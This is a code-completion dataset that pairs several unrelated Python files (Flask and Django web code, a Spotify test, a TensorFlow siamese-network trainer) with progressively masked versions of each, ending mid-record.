import os import json basedir = os.path.abspath(os.path.dirname(__file__)) # CHECK IF PRODUCTION CONFIG EXISTS if os.path.exists('/etc/config.json'): with open('/etc/config.json') as config_file: config = json.load(config_file) else: with open('dev_config.json') as config_file: config = json.load(config_file) class Config: SECRET_KEY = config.get('SECRET_KEY') SQLALCHEMY_TRACK_MODIFICATIONS = False MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com') MAIL_PORT = int(config.get('MAIL_PORT', '465')) MAIL_USE_TLS = False MAIL_USE_SSL = True MAIL_USERNAME = config.get('MAIL_USERNAME') MAIL_PASSWORD = config.get('MAIL_PASSWORD') MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX') MAIL_SENDER = config.get('MAIL_SENDER') @staticmethod def init_app(app): pass class DevelopmentConfig(Config): DEBUG = True SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL') or \ 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite') class TestingConfig(Config): TESTING = True SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, '../data-test.sqlite') class ProductionConfig(Config): SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL') config = { 'development': DevelopmentConfig, 'testing': TestingConfig, 'production': ProductionConfig }
normal
{ "blob_id": "1f7147c914eee37776c0418575e93e3d36ee3aa5", "index": 7099, "step-1": "<mask token>\n\n\nclass Config:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'\n ) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')\n\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,\n '../data-test.sqlite')\n\n\nclass ProductionConfig(Config):\n SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass Config:\n SECRET_KEY = config.get('SECRET_KEY')\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')\n MAIL_PORT = int(config.get('MAIL_PORT', '465'))\n MAIL_USE_TLS = False\n MAIL_USE_SSL = True\n MAIL_USERNAME = config.get('MAIL_USERNAME')\n MAIL_PASSWORD = config.get('MAIL_PASSWORD')\n MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')\n MAIL_SENDER = config.get('MAIL_SENDER')\n\n @staticmethod\n def init_app(app):\n pass\n\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'\n ) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')\n\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,\n '../data-test.sqlite')\n\n\nclass ProductionConfig(Config):\n SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')\n\n\n<mask token>\n", "step-3": "<mask token>\nif os.path.exists('/etc/config.json'):\n with open('/etc/config.json') as config_file:\n config = json.load(config_file)\nelse:\n with open('dev_config.json') as config_file:\n config = json.load(config_file)\n\n\nclass Config:\n SECRET_KEY = config.get('SECRET_KEY')\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')\n MAIL_PORT = int(config.get('MAIL_PORT', '465'))\n MAIL_USE_TLS = False\n MAIL_USE_SSL = True\n MAIL_USERNAME = config.get('MAIL_USERNAME')\n MAIL_PASSWORD = config.get('MAIL_PASSWORD')\n MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')\n MAIL_SENDER = config.get('MAIL_SENDER')\n\n @staticmethod\n def init_app(app):\n pass\n\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'\n ) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')\n\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,\n '../data-test.sqlite')\n\n\nclass ProductionConfig(Config):\n SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')\n\n\n<mask token>\n", "step-4": "<mask token>\nbasedir = os.path.abspath(os.path.dirname(__file__))\nif os.path.exists('/etc/config.json'):\n with open('/etc/config.json') as config_file:\n config = json.load(config_file)\nelse:\n with open('dev_config.json') as config_file:\n config = json.load(config_file)\n\n\nclass Config:\n SECRET_KEY = config.get('SECRET_KEY')\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')\n MAIL_PORT = int(config.get('MAIL_PORT', '465'))\n MAIL_USE_TLS = False\n MAIL_USE_SSL = True\n MAIL_USERNAME = config.get('MAIL_USERNAME')\n MAIL_PASSWORD = config.get('MAIL_PASSWORD')\n MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')\n MAIL_SENDER = config.get('MAIL_SENDER')\n\n @staticmethod\n def init_app(app):\n pass\n\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'\n ) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')\n\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,\n '../data-test.sqlite')\n\n\nclass ProductionConfig(Config):\n SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')\n\n\nconfig = {'development': DevelopmentConfig, 'testing': TestingConfig,\n 'production': ProductionConfig}\n", "step-5": "import os\nimport json\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\n# CHECK IF PRODUCTION CONFIG EXISTS\nif os.path.exists('/etc/config.json'):\n with open('/etc/config.json') as config_file:\n config = json.load(config_file)\nelse:\n with open('dev_config.json') as config_file:\n config = json.load(config_file)\n\n\nclass Config:\n SECRET_KEY = config.get('SECRET_KEY')\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')\n MAIL_PORT = int(config.get('MAIL_PORT', '465'))\n MAIL_USE_TLS = False\n MAIL_USE_SSL = True\n MAIL_USERNAME = config.get('MAIL_USERNAME')\n MAIL_PASSWORD = config.get('MAIL_PASSWORD')\n MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')\n MAIL_SENDER = config.get('MAIL_SENDER')\n\n @staticmethod\n def init_app(app):\n pass\n\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL') or \\\n 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, '../data-test.sqlite')\n\n\nclass ProductionConfig(Config):\n SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')\n\n\nconfig = {\n 'development': DevelopmentConfig,\n 'testing': TestingConfig,\n 'production': ProductionConfig\n}\n", "step-ids": [ 7, 9, 10, 11, 13 ] }
[ 7, 9, 10, 11, 13 ]
# coding=utf-8 # @FileName: test_json.py # @Author: ZhengQiang # Date: 2020/1/15 5:26 下午 import json a = "{\"ddd\": {{}}}" def boyhook(dic): print('test') if dic['name']: return dic['name'], dic['age'] return dic new_boy = json.loads(a, object_hook=boyhook) print(new_boy)
normal
{ "blob_id": "2bc5711839ccbe525551b60211d8cd79ddb7775a", "index": 7019, "step-1": "<mask token>\n\n\ndef boyhook(dic):\n print('test')\n if dic['name']:\n return dic['name'], dic['age']\n return dic\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef boyhook(dic):\n print('test')\n if dic['name']:\n return dic['name'], dic['age']\n return dic\n\n\n<mask token>\nprint(new_boy)\n", "step-3": "<mask token>\na = '{\"ddd\": {{}}}'\n\n\ndef boyhook(dic):\n print('test')\n if dic['name']:\n return dic['name'], dic['age']\n return dic\n\n\nnew_boy = json.loads(a, object_hook=boyhook)\nprint(new_boy)\n", "step-4": "import json\na = '{\"ddd\": {{}}}'\n\n\ndef boyhook(dic):\n print('test')\n if dic['name']:\n return dic['name'], dic['age']\n return dic\n\n\nnew_boy = json.loads(a, object_hook=boyhook)\nprint(new_boy)\n", "step-5": "# coding=utf-8\n# @FileName: test_json.py\n# @Author: ZhengQiang\n# Date: 2020/1/15 5:26 下午\nimport json\na = \"{\\\"ddd\\\": {{}}}\"\n\ndef boyhook(dic):\n print('test')\n if dic['name']:\n return dic['name'], dic['age']\n return dic\n\nnew_boy = json.loads(a, object_hook=boyhook)\nprint(new_boy)", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
from django.shortcuts import render from django.contrib import messages from django.views.generic import View from django.views.decorators.http import require_GET, require_POST from django.shortcuts import render, get_object_or_404 from django.http import HttpResponse,HttpResponsePermanentRedirect,HttpResponseRedirect from django.db.models import Count from .forms import UrlForm from .models import Link import random import string def short_url_gen(stringLength=5): """Generate a random string of fixed length """ letters = string.ascii_letters + string.digits return ''.join(random.choice(letters) for i in range(stringLength)) @require_GET def Follow(request,shorturl): link = get_object_or_404(Link,shorturl=shorturl) link.vi += 1 print(link.vi) link.save() return HttpResponseRedirect(link.link) def FormView(request): toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5] if request.user.is_authenticated: yl = Link.objects.filter(user = request.user) else: yl = None context = { 'form' :UrlForm, 'links':yl, 't':toplink } return render(request, 'shortu.html', context) @require_GET def info(request,shorturl): link = get_object_or_404(Link,shorturl=shorturl) return render(request,'info.html',{'link':link}) @require_POST def Submit(request): form = UrlForm(request.POST) if form.is_valid(): link = form.cleaned_data['url'] costom = form.cleaned_data['costom'] if costom: if Link.objects.filter(shorturl=costom).exists(): #messages(request,"Costom url aready taken") pass else: shorturl = costom newlink = Link.objects.create(link= link,user = request.user, shorturl= shorturl) return render(request,'info.html',{'link':newlink}) j=1 while j<11: newshort = short_url_gen(j) if Link.objects.filter(shorturl=costom).exists(): j+=1 continue newlink = Link.objects.create(link= link, shorturl= newshort,user = request.user) return render(request,'info.html',{'link':newlink}) return render(request, 'home.html')
normal
{ "blob_id": "11952e60ab95bc1896fd899a5ced126dcafec63a", "index": 9882, "step-1": "<mask token>\n\n\n@require_GET\ndef Follow(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n link.vi += 1\n print(link.vi)\n link.save()\n return HttpResponseRedirect(link.link)\n\n\ndef FormView(request):\n toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]\n if request.user.is_authenticated:\n yl = Link.objects.filter(user=request.user)\n else:\n yl = None\n context = {'form': UrlForm, 'links': yl, 't': toplink}\n return render(request, 'shortu.html', context)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\n@require_GET\ndef Follow(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n link.vi += 1\n print(link.vi)\n link.save()\n return HttpResponseRedirect(link.link)\n\n\ndef FormView(request):\n toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]\n if request.user.is_authenticated:\n yl = Link.objects.filter(user=request.user)\n else:\n yl = None\n context = {'form': UrlForm, 'links': yl, 't': toplink}\n return render(request, 'shortu.html', context)\n\n\n@require_GET\ndef info(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n return render(request, 'info.html', {'link': link})\n\n\n@require_POST\ndef Submit(request):\n form = UrlForm(request.POST)\n if form.is_valid():\n link = form.cleaned_data['url']\n costom = form.cleaned_data['costom']\n if costom:\n if Link.objects.filter(shorturl=costom).exists():\n pass\n else:\n shorturl = costom\n newlink = Link.objects.create(link=link, user=request.user,\n shorturl=shorturl)\n return render(request, 'info.html', {'link': newlink})\n j = 1\n while j < 11:\n newshort = short_url_gen(j)\n if Link.objects.filter(shorturl=costom).exists():\n j += 1\n continue\n newlink = Link.objects.create(link=link, shorturl=newshort,\n user=request.user)\n return render(request, 'info.html', {'link': newlink})\n return render(request, 'home.html')\n", "step-3": "<mask token>\n\n\ndef short_url_gen(stringLength=5):\n \"\"\"Generate a random string of fixed length \"\"\"\n letters = string.ascii_letters + string.digits\n return ''.join(random.choice(letters) for i in range(stringLength))\n\n\n@require_GET\ndef Follow(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n link.vi += 1\n print(link.vi)\n link.save()\n return HttpResponseRedirect(link.link)\n\n\ndef FormView(request):\n toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]\n if request.user.is_authenticated:\n yl = Link.objects.filter(user=request.user)\n else:\n yl = None\n context = {'form': UrlForm, 'links': yl, 't': toplink}\n return render(request, 'shortu.html', context)\n\n\n@require_GET\ndef info(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n return render(request, 'info.html', {'link': link})\n\n\n@require_POST\ndef Submit(request):\n form = UrlForm(request.POST)\n if form.is_valid():\n link = form.cleaned_data['url']\n costom = form.cleaned_data['costom']\n if costom:\n if Link.objects.filter(shorturl=costom).exists():\n pass\n else:\n shorturl = costom\n newlink = Link.objects.create(link=link, user=request.user,\n shorturl=shorturl)\n return render(request, 'info.html', {'link': newlink})\n j = 1\n while j < 11:\n newshort = short_url_gen(j)\n if Link.objects.filter(shorturl=costom).exists():\n j += 1\n continue\n newlink = Link.objects.create(link=link, shorturl=newshort,\n user=request.user)\n return render(request, 'info.html', {'link': newlink})\n return render(request, 'home.html')\n", "step-4": "from django.shortcuts import render\nfrom django.contrib import messages\nfrom django.views.generic import View\nfrom django.views.decorators.http import require_GET, require_POST\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, HttpResponsePermanentRedirect, HttpResponseRedirect\nfrom django.db.models import Count\nfrom .forms import UrlForm\nfrom .models import Link\nimport random\nimport string\n\n\ndef short_url_gen(stringLength=5):\n \"\"\"Generate a random string of fixed length \"\"\"\n letters = string.ascii_letters + string.digits\n return ''.join(random.choice(letters) for i in range(stringLength))\n\n\n@require_GET\ndef Follow(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n link.vi += 1\n print(link.vi)\n link.save()\n return HttpResponseRedirect(link.link)\n\n\ndef FormView(request):\n toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]\n if request.user.is_authenticated:\n yl = Link.objects.filter(user=request.user)\n else:\n yl = None\n context = {'form': UrlForm, 'links': yl, 't': toplink}\n return render(request, 'shortu.html', context)\n\n\n@require_GET\ndef info(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n return render(request, 'info.html', {'link': link})\n\n\n@require_POST\ndef Submit(request):\n form = UrlForm(request.POST)\n if form.is_valid():\n link = form.cleaned_data['url']\n costom = form.cleaned_data['costom']\n if costom:\n if Link.objects.filter(shorturl=costom).exists():\n pass\n else:\n shorturl = costom\n newlink = Link.objects.create(link=link, user=request.user,\n shorturl=shorturl)\n return render(request, 'info.html', {'link': newlink})\n j = 1\n while j < 11:\n newshort = short_url_gen(j)\n if Link.objects.filter(shorturl=costom).exists():\n j += 1\n continue\n newlink = Link.objects.create(link=link, shorturl=newshort,\n user=request.user)\n return render(request, 'info.html', {'link': newlink})\n return render(request, 'home.html')\n", "step-5": "from django.shortcuts import render\nfrom django.contrib import messages\nfrom django.views.generic import View\nfrom django.views.decorators.http import require_GET, require_POST\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse,HttpResponsePermanentRedirect,HttpResponseRedirect\nfrom django.db.models import Count\n\nfrom .forms import UrlForm\nfrom .models import Link\n\nimport random\nimport string\n\ndef short_url_gen(stringLength=5):\n \"\"\"Generate a random string of fixed length \"\"\"\n letters = string.ascii_letters + string.digits\n return ''.join(random.choice(letters) for i in range(stringLength))\n@require_GET\ndef Follow(request,shorturl):\n link = get_object_or_404(Link,shorturl=shorturl)\n link.vi += 1\n print(link.vi)\n link.save()\n return HttpResponseRedirect(link.link)\n\ndef FormView(request):\n toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]\n if request.user.is_authenticated:\n yl = Link.objects.filter(user = request.user)\n else:\n yl = None\n context = {\n 'form' :UrlForm,\n 'links':yl,\n 't':toplink\n }\n\n return render(request, 'shortu.html', context)\n@require_GET\ndef info(request,shorturl):\n link = get_object_or_404(Link,shorturl=shorturl)\n return render(request,'info.html',{'link':link})\n\n@require_POST\ndef Submit(request):\n form = UrlForm(request.POST)\n if form.is_valid():\n link = form.cleaned_data['url']\n costom = form.cleaned_data['costom']\n if costom:\n if Link.objects.filter(shorturl=costom).exists():\n #messages(request,\"Costom url aready taken\")\n pass\n else: \n shorturl = costom\n newlink = Link.objects.create(link= link,user = request.user, shorturl= shorturl)\n return render(request,'info.html',{'link':newlink})\n j=1\n while j<11:\n newshort = short_url_gen(j)\n if Link.objects.filter(shorturl=costom).exists():\n j+=1\n continue\n newlink = Link.objects.create(link= link, shorturl= newshort,user = request.user)\n return render(request,'info.html',{'link':newlink})\n \n\n return render(request, 'home.html')", "step-ids": [ 2, 4, 5, 6, 7 ] }
[ 2, 4, 5, 6, 7 ]
#!/usr/bin/python from PyMca5.PyMcaGui import PyMcaQt as qt from RixsTool import mainWindow app = qt.QApplication([]) win = mainWindow.RIXSMainWindow() win.show() app.exec_()
normal
{ "blob_id": "34c8541e640596f51a5232cba06172df5814db14", "index": 7734, "step-1": "<mask token>\n", "step-2": "<mask token>\nwin.show()\napp.exec_()\n", "step-3": "<mask token>\napp = qt.QApplication([])\nwin = mainWindow.RIXSMainWindow()\nwin.show()\napp.exec_()\n", "step-4": "from PyMca5.PyMcaGui import PyMcaQt as qt\nfrom RixsTool import mainWindow\napp = qt.QApplication([])\nwin = mainWindow.RIXSMainWindow()\nwin.show()\napp.exec_()\n", "step-5": "#!/usr/bin/python\n\nfrom PyMca5.PyMcaGui import PyMcaQt as qt\nfrom RixsTool import mainWindow\napp = qt.QApplication([])\nwin = mainWindow.RIXSMainWindow()\nwin.show()\napp.exec_()\n ", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
# Generated by Django 3.0.4 on 2021-03-27 19:18 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('electra', '0009_remove_response_img'), ] operations = [ migrations.AddField( model_name='response', name='date_time', field=models.DateTimeField(auto_now_add=True, null=True), ), ]
normal
{ "blob_id": "049d83bc1a31ef170654fda47d1f58e024befb44", "index": 8220, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('electra', '0009_remove_response_img')]\n operations = [migrations.AddField(model_name='response', name=\n 'date_time', field=models.DateTimeField(auto_now_add=True, null=True))]\n", "step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('electra', '0009_remove_response_img')]\n operations = [migrations.AddField(model_name='response', name=\n 'date_time', field=models.DateTimeField(auto_now_add=True, null=True))]\n", "step-5": "# Generated by Django 3.0.4 on 2021-03-27 19:18\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('electra', '0009_remove_response_img'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='response',\n name='date_time',\n field=models.DateTimeField(auto_now_add=True, null=True),\n ),\n ]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
"""Test Spotify module""" from spoetify.spotify import Spotify from nose.tools import assert_equal def test_search_track(): sp = Spotify() t = sp.search_track("avocado") assert_equal(t.id, "1UyzA43l3OIcJ6jd3hh3ac")
normal
{ "blob_id": "337309da79ce9d90010fef5c171b6b344e6dc63f", "index": 5937, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef test_search_track():\n sp = Spotify()\n t = sp.search_track('avocado')\n assert_equal(t.id, '1UyzA43l3OIcJ6jd3hh3ac')\n", "step-3": "<mask token>\nfrom spoetify.spotify import Spotify\nfrom nose.tools import assert_equal\n\n\ndef test_search_track():\n sp = Spotify()\n t = sp.search_track('avocado')\n assert_equal(t.id, '1UyzA43l3OIcJ6jd3hh3ac')\n", "step-4": "\"\"\"Test Spotify module\"\"\"\nfrom spoetify.spotify import Spotify\nfrom nose.tools import assert_equal\n\n\ndef test_search_track():\n sp = Spotify()\n t = sp.search_track(\"avocado\")\n assert_equal(t.id, \"1UyzA43l3OIcJ6jd3hh3ac\")\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import tensorflow as tf from tensorflow.python.framework import graph_util from net import siameseNet_batchnorm as siameseNet import dataset import numpy as np import cv2 import os batch_size=64 input_height=32 input_width=32 total_epoch_num=50 snapshot=100 support_image_extensions=[".jpg",".png",".jpeg",".bmp"] margin=1.0 channals=3 train_image_root="D:/forTensorflow/charRecTrain/forMyDNNCode/train" test_image_root="D:/forTensorflow/charRecTrain/forMyDNNCode/test" model_path="models/" pb_path=os.path.join(model_path,"pb/") ckpt_path=os.path.join(model_path,"ckpt/") if not os.path.exists(pb_path): os.makedirs(pb_path) if not os.path.exists(ckpt_path): os.makedirs(ckpt_path) model_name="siamese_triplet_28out_allloss_bn" if __name__ == '__main__': # image_paths,labels=get_images_path(test_image_root) # data=next_batch(True,None,image_paths,labels) # for left,right,label in zip(*data): # cv2.imshow("left",left) # cv2.imshow("right", right) # print(label) # cv2.waitKey(0) first_shape=None anchor_placeholder = tf.placeholder(tf.float32,shape=[first_shape,input_height,input_width,channals],name="anchor") similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape, input_height, input_width, channals], name="similar") dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape, input_height, input_width, channals], name="dissimilar") labels_placeholder = tf.placeholder(tf.float32, shape= [None if first_shape is None else first_shape * 3, ], name="labels") is_training_placeholder = tf.placeholder_with_default(False, shape=(), name="is_training") siamese_net=siameseNet.siameseNet() anchor = siamese_net.inference(anchor_placeholder,reuse=False,is_training=is_training_placeholder) similar = siamese_net.inference(similar_placeholder,reuse=True,is_training=is_training_placeholder) dissimilar = siamese_net.inference(dissimilar_placeholder,reuse=True,is_training=is_training_placeholder) loss,pos_dist,neg_dist = siamese_net.loss(anchor,similar,dissimilar,labels_placeholder,margin) flatten_out_anchor = tf.identity(anchor, name="flatten_anchor") flatten_out_similar = tf.identity(similar, name="flatten_similar") flatten_out_dissimilar = tf.identity(dissimilar, name="flatten_dissimilar") update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) global_step = tf.Variable(0, trainable=False) # learning_rate = tf.train.exponential_decay(0.01, global_step, 100, 0.9) # optimizer = tf.train.MomentumOptimizer(learning_rate, 0.9) with tf.control_dependencies([tf.group(*update_ops)]): # train_step = optimizer.minimize(loss, global_step) train_step = tf.train.MomentumOptimizer(0.01, 0.90).\ minimize(loss, global_step=global_step) var_list = tf.trainable_variables() if global_step is not None: var_list.append(global_step) g_list = tf.global_variables() # 从全局变量中获得batch norm的缩放和偏差 bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name] bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name] var_list += bn_moving_vars ckpt_saver = tf.train.Saver() train_dataset = dataset.dataset(train_image_root,batch_size,support_image_extensions, input_height,input_width,channals) test_dataset = dataset.dataset(test_image_root, batch_size, support_image_extensions, input_height, input_width, channals) with tf.Session() as sess: sess.run(tf.global_variables_initializer()) # if os.path.exists(os.path.join(ckpt_path, "checkpoint")): # ckpt_saver.restore(sess, tf.train.latest_checkpoint(ckpt_path)) total_iters_num = 0 for epoch_num in range(total_epoch_num): train_images_num = train_dataset.sample_len cur_epoch_iters_num = train_images_num // batch_size for iters_num in range(cur_epoch_iters_num): train_anchor, train_similar, train_dissimilar,train_labels = \ train_dataset.next_triplet_batch() test_anchor, test_similar, test_dissimilar,test_labels = \ test_dataset.next_triplet_batch() if train_anchor is None or test_anchor is None: continue train_dict = {anchor_placeholder: train_anchor, similar_placeholder: train_similar, dissimilar_placeholder: train_dissimilar, labels_placeholder:train_labels, is_training_placeholder:True} test_dict = {anchor_placeholder: test_anchor, similar_placeholder: test_similar, dissimilar_placeholder: test_dissimilar, labels_placeholder:test_labels, is_training_placeholder: False} _,_global_step=sess.run([train_step,global_step], feed_dict=train_dict) anchor_out,similar_out,dissimilar_out = sess.run([ flatten_out_anchor,flatten_out_similar,flatten_out_dissimilar], feed_dict=train_dict) _train_loss,_train_pos_dist,_train_neg_dist = \ sess.run([loss,pos_dist,neg_dist], feed_dict=train_dict) _test_loss,_test_pos_dist,_test_neg_dist =\ sess.run([loss,pos_dist,neg_dist], feed_dict=test_dict) print("distance:",list(zip(_train_pos_dist.flatten(),_train_neg_dist.flatten()))[:5]) one_moving_meaning_show = "No mean or variance" if len(bn_moving_vars) > 0: one_moving_meaning = sess.graph.get_tensor_by_name(bn_moving_vars[0].name) one_moving_meaning_show = "{}={}".\ format(bn_moving_vars[0].name,np.mean(one_moving_meaning.eval())) print(one_moving_meaning_show) show_text = "epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}".format \ (epoch_num, iters_num + 1, _global_step, _train_loss, "0.99", _test_loss) print(show_text) if _global_step % snapshot == 0: # 保存PB constant_graph = graph_util.convert_variables_to_constants(sess, sess.graph_def, ["flatten_anchor"]) save_model_name=model_name + "-" + str(_global_step) + ".pb" with tf.gfile.FastGFile(pb_path + save_model_name, mode="wb") as fw: fw.write(constant_graph.SerializeToString()) # 保存CKPT ckpt_saver.save(sess, ckpt_path + model_name + ".ckpt", global_step=total_iters_num) print("Successfully saved model {}".format(save_model_name))
normal
{ "blob_id": "97bbb181cbc0f5bfbf0b2298133fc226b6217d91", "index": 399, "step-1": "<mask token>\n", "step-2": "<mask token>\nif not os.path.exists(pb_path):\n os.makedirs(pb_path)\nif not os.path.exists(ckpt_path):\n os.makedirs(ckpt_path)\n<mask token>\nif __name__ == '__main__':\n first_shape = None\n anchor_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='anchor')\n similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='similar')\n dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='dissimilar')\n labels_placeholder = tf.placeholder(tf.float32, shape=[None if \n first_shape is None else first_shape * 3], name='labels')\n is_training_placeholder = tf.placeholder_with_default(False, shape=(),\n name='is_training')\n siamese_net = siameseNet.siameseNet()\n anchor = siamese_net.inference(anchor_placeholder, reuse=False,\n is_training=is_training_placeholder)\n similar = siamese_net.inference(similar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n dissimilar = siamese_net.inference(dissimilar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n loss, pos_dist, neg_dist = siamese_net.loss(anchor, similar, dissimilar,\n labels_placeholder, margin)\n flatten_out_anchor = tf.identity(anchor, name='flatten_anchor')\n flatten_out_similar = tf.identity(similar, name='flatten_similar')\n flatten_out_dissimilar = tf.identity(dissimilar, name='flatten_dissimilar')\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n global_step = tf.Variable(0, trainable=False)\n with tf.control_dependencies([tf.group(*update_ops)]):\n train_step = tf.train.MomentumOptimizer(0.01, 0.9).minimize(loss,\n global_step=global_step)\n var_list = tf.trainable_variables()\n if global_step is not None:\n var_list.append(global_step)\n g_list = tf.global_variables()\n bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]\n bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]\n var_list += bn_moving_vars\n ckpt_saver = tf.train.Saver()\n train_dataset = dataset.dataset(train_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n test_dataset = dataset.dataset(test_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n total_iters_num = 0\n for epoch_num in range(total_epoch_num):\n train_images_num = train_dataset.sample_len\n cur_epoch_iters_num = train_images_num // batch_size\n for iters_num in range(cur_epoch_iters_num):\n (train_anchor, train_similar, train_dissimilar, train_labels\n ) = train_dataset.next_triplet_batch()\n test_anchor, test_similar, test_dissimilar, test_labels = (\n test_dataset.next_triplet_batch())\n if train_anchor is None or test_anchor is None:\n continue\n train_dict = {anchor_placeholder: train_anchor,\n similar_placeholder: train_similar,\n dissimilar_placeholder: train_dissimilar,\n labels_placeholder: train_labels,\n is_training_placeholder: True}\n test_dict = {anchor_placeholder: test_anchor,\n similar_placeholder: test_similar,\n dissimilar_placeholder: test_dissimilar,\n labels_placeholder: test_labels,\n is_training_placeholder: False}\n _, _global_step = sess.run([train_step, global_step],\n feed_dict=train_dict)\n anchor_out, similar_out, dissimilar_out = sess.run([\n flatten_out_anchor, flatten_out_similar,\n flatten_out_dissimilar], feed_dict=train_dict)\n _train_loss, _train_pos_dist, _train_neg_dist = sess.run([\n loss, pos_dist, neg_dist], feed_dict=train_dict)\n _test_loss, _test_pos_dist, _test_neg_dist = sess.run([loss,\n pos_dist, neg_dist], feed_dict=test_dict)\n print('distance:', list(zip(_train_pos_dist.flatten(),\n _train_neg_dist.flatten()))[:5])\n one_moving_meaning_show = 'No mean or variance'\n if len(bn_moving_vars) > 0:\n one_moving_meaning = sess.graph.get_tensor_by_name(\n bn_moving_vars[0].name)\n one_moving_meaning_show = 